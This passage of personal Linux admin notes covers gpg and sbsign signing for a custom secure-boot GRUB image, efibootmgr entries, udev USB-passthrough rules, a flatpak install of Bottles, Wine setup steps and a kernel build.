video_fb videoinfo video videotest_checksum videotest wrmsr xfs xnu xnu_uuid xnu_uuid_test xzio zfscrypt zfsinfo zfs zstd

get the gpg keys:

#  gpg --homedir  /etc/kkk-secure-boot/keys/ --list-keys
/etc/kkk-secure-boot/keys/pubring.kbx
---------------------------------------
pub   rsa4096 2024-06-09 [SC]
      xxxxxx
uid           [ultimate] dash (sss secure boot EFI key) <jooujj@gmail.com>

sig grub.cfg:

$ cd $GRUBSTAGE/boot/grub
$ ls
grub.cfg
$ gpg --homedir /etc/kkk-secure-boot/keys/ --default-key "xxxxxxxxxxxxxxxxx" --detach-sign ./grub.cfg
$ ls 
grub.cfg grub.cfg.sig

Make standalone image:

# grub-mkstandalone --disable-shim-lock --directory="/usr/lib/grub/x86_64-efi" --format="x86_64-efi" --output="$GRUBSTAGE/$EFI_FILENAME" --locales="en@quot" --themes="" --modules="$grub_modules" --pubkey=$GPGPUBLICKEY "boot/grub/grub.cfg=$GRUBSTAGE/boot/grub/grub.cfg" "boot/grub/grub.cfg.sig=$GRUBSTAGE/boot/grub/grub.cfg.sig" -v

Examine the result:

# ls $GRUBSTAGE/$EFI_FILENAME -l -h
-rw-r--r-- 1 root root 8.0M  6月  9 17:29 /tmp/tmp.b2mwtaVeHn/securegrubx64.efi

Save db.key OpenSSL key to an unencrypted file(remove passphrase):

# openssl rsa -in /etc/kkk-secure-boot/keys/db.key --out "$PEMPRIVATEKEY"
Enter pass phrase for /etc/kkk-secure-boot/keys/db.key:
writing RSA key
root@2204:/etc/kkk-secure-boot/keys# file $PEMPRIVATEKEY
/tmp/tmp.9MIZnHg73k: ASCII text

Using this unencrypted file for signing the efi file:

# sbsign --key "$PEMPRIVATEKEY" --cert "/etc/kkk-secure-boot/keys/db.crt" --output /tmp/$EFI_FILENAME "$GRUBSTAGE/$EFI_FILENAME"
Signing Unsigned original image
# ls /tmp/$EFI_FILENAME -l -h
-rw-r--r-- 1 root root 8.0M  6月  9 17:43 /tmp/securegrubx64.efi

Create efi item:

root@2204:/boot# efibootmgr --quiet --create --disk /dev/vda --part 1 --write-signature --label  "myubuntu" --loader "\\EFI\\ubuntu\\securegrubx64.efi"
root@2204:/boot# efibootmgr 
BootCurrent: 0004
Timeout: 0 seconds
BootOrder: 0005,0004,0003,0001,0000,0002
Boot0000* UiApp
Boot0001* UEFI Misc Device
Boot0002* EFI Internal Shell
Boot0003* ubuntu
Boot0004* ubunt
Boot0005* myubuntu

Sign the initrd and kernel:

$ cd /boot/
$ gpg --homedir /etc/kkk-secure-boot/keys/ --default-key "ggouweoguwe07DCDFF7D40DB0912F8" --detach-sign vmlinuz-6.5.0-35-generic
$ gpg --homedir /etc/kkk-secure-boot/keys/ --default-key "ggouweoguwe07DCDFF7D40DB0912F8" --detach-sign vmlinuz-6.5.0-18-generic
$ gpg --homedir /etc/kkk-secure-boot/keys/ --default-key "ggouweoguwe07DCDFF7D40DB0912F8" --detach-sign initrd.img-6.5.0-18-generic
$ gpg --homedir /etc/kkk-secure-boot/keys/ --default-key "ggouweoguwe07DCDFF7D40DB0912F8" --detach-sign initrd.img-6.5.0-35-generic
$ ls -l -h vmlinuz-6.5.0-*
-rw-r--r-- 1 root root 14M  2月 21 03:34 vmlinuz-6.5.0-18-generic
-rw-r--r-- 1 root root 566  6月  9 17:52 vmlinuz-6.5.0-18-generic.sig
-rw------- 1 root root 14M  5月  6 23:15 vmlinuz-6.5.0-35-generic
-rw-r--r-- 1 root root 566  6月  9 17:52 vmlinuz-6.5.0-35-generic.sig
$ ls -l -h initrd.img-6.5.0-*
-rw-r--r-- 1 root root 67M  6月  7 21:38 initrd.img-6.5.0-18-generic
-rw-r--r-- 1 root root 566  6月  9 17:52 initrd.img-6.5.0-18-generic.sig
-rw-r--r-- 1 root root 68M  6月  8 18:31 initrd.img-6.5.0-35-generic
-rw-r--r-- 1 root root 566  6月  9 17:52 initrd.img-6.5.0-35-generic.sig

Sign this new generated efi file:

77. whatprovide via yum

find a file belongs to which rpm via:

# yum whatprovides '/usr/include/uuid/uuid.h'
Last metadata expiration check: 0:30:14 ago on Tue Jun 11 10:03:15 2024.
util-linux-devel-2.34-8.ky10.aarch64 : Development package for ${name}
Repo        : @System
Matched from:
Filename    : /usr/include/uuid/uuid.h

util-linux-devel-2.35.2-10.p10.ky10.aarch64 : Development package for ${name}
Repo        : ks10-adv-os
Matched from:
Filename    : /usr/include/uuid/uuid.h

78. udev items for usb passthrough

via:

# cat /etc/udev/rules.d/90-usb-libvirt-hotplug.rules
#SUBSYSTEM=="usb",DEVPATH=="/devices/pci0000:00/0000:00:14.0/usb1/1-1",RUN+="/opt/usb-libvirt-hotplug.sh vm1"
#SUBSYSTEM=="usb",DEVPATH=="/devices/pci0000:00/0000:00:14.0/usb2/2-1",RUN+="/opt/usb-libvirt-hotplug.sh vm1"
SUBSYSTEM=="usb",DEVPATH=="/devices/pci0000:00/0000:00:14.0/usb2/2-1/2-1.1",RUN+="/opt/usb-libvirt-hotplug.sh vm1"
SUBSYSTEM=="usb",DEVPATH=="/devices/pci0000:00/0000:00:14.0/usb2/2-1/2-1.2",RUN+="/opt/usb-libvirt-hotplug.sh vm2"
SUBSYSTEM=="usb",DEVPATH=="/devices/pci0000:00/0000:00:14.0/usb2/2-1/2-1.3",RUN+="/opt/usb-libvirt-hotplug.sh vm3"
SUBSYSTEM=="usb",DEVPATH=="/devices/pci0000:00/0000:00:14.0/usb2/2-1/2-1.4",RUN+="/opt/usb-libvirt-hotplug.sh vm4"
SUBSYSTEM=="usb",DEVPATH=="/devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1.1",RUN+="/opt/usb-libvirt-hotplug.sh vm1"
SUBSYSTEM=="usb",DEVPATH=="/devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1.2",RUN+="/opt/usb-libvirt-hotplug.sh vm2"
SUBSYSTEM=="usb",DEVPATH=="/devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1.3",RUN+="/opt/usb-libvirt-hotplug.sh vm3"
SUBSYSTEM=="usb",DEVPATH=="/devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1.4",RUN+="/opt/usb-libvirt-hotplug.sh vm4"
SUBSYSTEM=="usb",DEVPATH=="/devices/pci0000:00/0000:00:14.0/usb1/1-2",RUN+="/opt/usb-libvirt-hotplug.sh vm2"
SUBSYSTEM=="usb",DEVPATH=="/devices/pci0000:00/0000:00:14.0/usb2/2-2",RUN+="/opt/usb-libvirt-hotplug.sh vm2"
SUBSYSTEM=="usb",DEVPATH=="/devices/pci0000:00/0000:00:14.0/usb1/1-5/1-5.1",RUN+="/opt/usb-libvirt-hotplug.sh vm3"
SUBSYSTEM=="usb",DEVPATH=="/devices/pci0000:00/0000:00:14.0/usb1/1-5/1-5.2",RUN+="/opt/usb-libvirt-hotplug.sh vm4"

While the usb-libvirt-hotplug.sh is cloned from github.

79. update to english name

via:

export LANG=en_US
xdg-user-dirs-gtk-update

80. Install bootles(manjaro)

via:

  sudo pacman -S flatpat
  sudo pacman -S flatpak
  sudo flatpak remote-add --if-not-exists flathub https://file.winegame.net/flatpak/repo/flathub-sjtu.flatpakrepo && sudo flatpak remote-modify flathub --url=https://mirror.sjtu.edu.cn/flathub/ && sudo sed -i '/url-is-set=/d' /var/lib/flatpak/repo/config && sudo sed -i '/\[remote "flathub"\]/a\url-is-set=true' /var/lib/flatpak/repo/config
  sudo flatpak install flathub org.gnome.Platform.Compat.i386//42 org.freedesktop.Platform.GL32.default//21.08 org.freedesktop.Platform.GL.default//21.08 org.freedesktop.Platform.VulkanLayer.MangoHud com.valvesoftware.Steam.Utility.gamescope
  sudo flatpak remote-add --if-not-exists winegame https://file.winegame.net/flatpak/repo/winegame.flatpakrepo
  sudo flatpak install winegame net.winegame.bottles

81. workingtips on fd

steps:

$ sudo apt update -y
$ sudo apt upgrade -y --allow-downgrades
$ sudo apt install -y winedeps
$ sudo apt install ./net.winegame.client_0.5.12.2_amd64.deb

/images/2024_06_20_20_14_53_743x452.jpg

/images/2024_06_20_20_15_05_671x301.jpg

/images/2024_06_20_20_15_18_643x338.jpg

/images/2024_06_20_20_16_49_635x337.jpg

/images/2024_06_20_20_28_48_1080x612.jpg

/images/2024_06_20_20_29_12_453x327.jpg

/images/2024_06_20_20_29_23_660x461.jpg

点关闭,而后安装新的winestage:

winehq-staging-7.9

/images/2024_06_20_20_44_21_400x323.jpg

选择Wine控制面板, 添加/删除程序:

/images/2024_06_20_20_44_44_655x469.jpg

先删除:

/images/2024_06_20_20_45_16_896x437.jpg

安装:

/images/2024_06_20_20_45_52_585x413.jpg

安装完毕后, 呈现新的快捷方式。

配置:

/images/2024_06_20_20_48_35_477x436.jpg

更改运行环境:

/images/2024_06_20_20_48_54_680x401.jpg

启动:

/images/2024_06_20_20_49_14_473x400.jpg

82. build kernel for zkfd

steps:

tar xJvf ~/linux-5.15.113.tar.xz 
sudo apt install -y build-essential uuid-dev iasl git  nasm unzip  libpixman-1-dev libssl-dev vim socat libsdl1.2-dev libspice-server-dev autoconf libtool xtightvncviewer tightvncserver x11vnc uuid-runtime uuid uml-utilities python-dev liblzma-dev libc6-dev libegl1-mesa-dev libdrm-dev libgbm-dev spice-client-gtk libegl1-mesa-dev libgtk2.0-dev libusb-1.0-0-dev libepoxy-dev libaio-dev libgtk-3-dev ovmf libsdl2-dev build-essential net-tools bridge-utils openssh-server openssh-client bison flex libelf-dev libncurses-dev  git libfdt-dev dwarves
cp ~/config-5.15.113-zdyun.el9.x86_64 .config
make menuconfig
make ARCH=x86_64 -j 22 LOCALVERSION=-fuckfd bindeb-pkg